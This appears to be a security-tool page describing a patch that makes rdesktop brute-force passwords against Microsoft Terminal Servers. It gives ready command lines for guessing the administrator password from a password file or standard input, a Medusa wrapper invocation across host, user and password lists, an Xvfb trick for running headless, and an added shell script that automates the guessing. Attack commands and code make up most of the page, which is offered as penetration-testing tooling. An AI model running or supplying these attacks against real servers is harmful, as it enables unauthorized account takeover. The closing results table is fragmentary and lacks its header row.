Some quick notes about "brute-forcing RDP"...
The following patch to rdesktop adds the ability to perform brute-force password guessing against Microsoft Terminal Servers. This functionality was initially based on a patch found at cqure.net. However, significant modifications were made to allow testing against Windows 2000 and to detect error messages beyond a simple pass/fail. The following is a brief summary of the included changes:
rdesktop 1.4.1 patch: rdp-brute-force-r422.diff
rdesktop 1.5 patch: rdp-brute-force-r805.diff (thanks to Anton Bolshakov for the patch)
Brute-force attack using a password file:
rdesktop -u administrator -p passwords.txt 192.168.0.100
Brute-force attack sending passwords via STDIN:
rdesktop -u administrator -p - 192.168.0.100
The following example shows one way to use rdesktop with Medusa's wrapper module. Medusa substitutes the current user and host for %U and %H in ARGS, and TYPE:STDIN makes it write each password to rdesktop's standard input, which is why rdesktop is given "-p -":
medusa -M wrapper -m TYPE:STDIN -m PROG:rdesktop -m ARGS:"-u %U -p - %H" -H hosts.txt -U users.txt -P passwords.txt
One possible method for hiding the graphical output from rdesktop is to run a virtual framebuffer X server and point DISPLAY at it (note that -ac disables X access control, so keep -nolisten tcp so the server is not reachable over the network):
% Xvfb :97 -ac -nolisten tcp &
% export DISPLAY=:97
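The script below is an added illustration, not part of the rdesktop patch or of Medusa. It ties the steps above together: start Xvfb on :97 when no DISPLAY is set, expand a Medusa-style argument template (%U, %H), feed the password list to the program's standard input (the patched rdesktop's "-p -" mode), and walk a hosts file against a users file the way the Medusa invocation does. The function names are assumptions, and because this page does not document the patched rdesktop's output format or exit codes, the script only relays the program's exit status rather than interpreting it; you can point PROG at any binary that takes the same arguments.

```shell
#!/bin/sh
# Added example: scripts the rdesktop "-p -" STDIN mode behind a headless
# X server. Not the rdesktop patch's own code; function names are assumed.

# Start Xvfb on display :97 if no DISPLAY is set and Xvfb is installed.
# -ac disables X access control, which is tolerable only because
# -nolisten tcp keeps the server off the network.
ensure_display() {
    if [ -z "${DISPLAY:-}" ] && command -v Xvfb >/dev/null 2>&1; then
        Xvfb :97 -ac -nolisten tcp >/dev/null 2>&1 &
        DISPLAY=:97
        export DISPLAY
        sleep 1   # give the server a moment to start accepting clients
    fi
}

# Replace the Medusa tokens %U (user) and %H (host) in an argument template.
# Plain sed substitution: fine for usernames and IP addresses, but a user or
# host containing '/' or '&' would need escaping first.
expand_args() {
    template=$1 user=$2 host=$3
    printf '%s\n' "$template" | sed -e "s/%U/$user/g" -e "s/%H/$host/g"
}

# Run one user/host pair: PROG gets the expanded arguments and reads the
# password list (one per line) from its standard input.
# Returns PROG's exit status unchanged.
guess_one() {
    prog=$1 template=$2 user=$3 host=$4 pwfile=$5
    args=$(expand_args "$template" "$user" "$host")
    # word-splitting of $args into separate arguments is intentional
    "$prog" $args < "$pwfile"
}

# Walk hosts x users like the Medusa wrapper invocation on the page, printing
# each pair with PROG's exit status so the run can be grepped afterwards.
guess_all() {
    prog=$1 template=$2 hosts=$3 users=$4 pwfile=$5
    ensure_display
    while read -r host; do
        [ -n "$host" ] || continue
        while read -r user; do
            [ -n "$user" ] || continue
            if guess_one "$prog" "$template" "$user" "$host" "$pwfile"; then
                status=0
            else
                status=$?
            fi
            printf '%s %s exit=%s\n' "$host" "$user" "$status"
        done < "$users"
    done < "$hosts"
}

# Usage (assumes hosts.txt, users.txt and passwords.txt in the current dir):
#   guess_all rdesktop "-u %U -p - %H" hosts.txt users.txt passwords.txt
```

Because the exit status of the patched rdesktop is not specified on this page, treat the printed "exit=" value as a pointer to where to look in the program's own output rather than as a verdict.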
It should be noted that this patch relies on matching data which rdesktop refers to as text. Of course, this isn't text, but what I think is some graphical representation of what the text on the screen should be. The message for a particular error varied between OS versions (2K, 2K3 and XP), but seemed to be consistent across multiple installs of the same OS. Of course, your luck may vary. If anyone has a better method for detecting this stuff, please let me know. Feel free to also let me know if this actually works for you.
Current test cases. Each cell contains the results of two attempts, one with a
valid password and one with an invalid password (valid/invalid), with one
result column per OS tested.

| Interactive Logon Not Permitted    | FAIL(2*)/FAIL   | SUCCESS(1)/FAIL | SUCCESS(1)/FAIL |
| Expired, Must Change Password      | SUCCESS(1)/FAIL | SUCCESS(1)/FAIL | SUCCESS(1)/FAIL |
| Must Change at First Logon         | SUCCESS(3)/FAIL | SUCCESS(1)/FAIL | SUCCESS(1)/FAIL |
| User Currently Logged In           | SUCCESS(1)/FAIL |
| Terminal Server Exceeded Max Conn. | SUCCESS/FAIL    | SUCCESS(1)/FAIL |

Notes:
1 - Displays corresponding error message
2 - Incorrect response, no unique text to match on
3 - Displays same error as "Expired, Must Change Password"
4 - W2K sends disabled message regardless of password. XP sends disabled only if password is correct.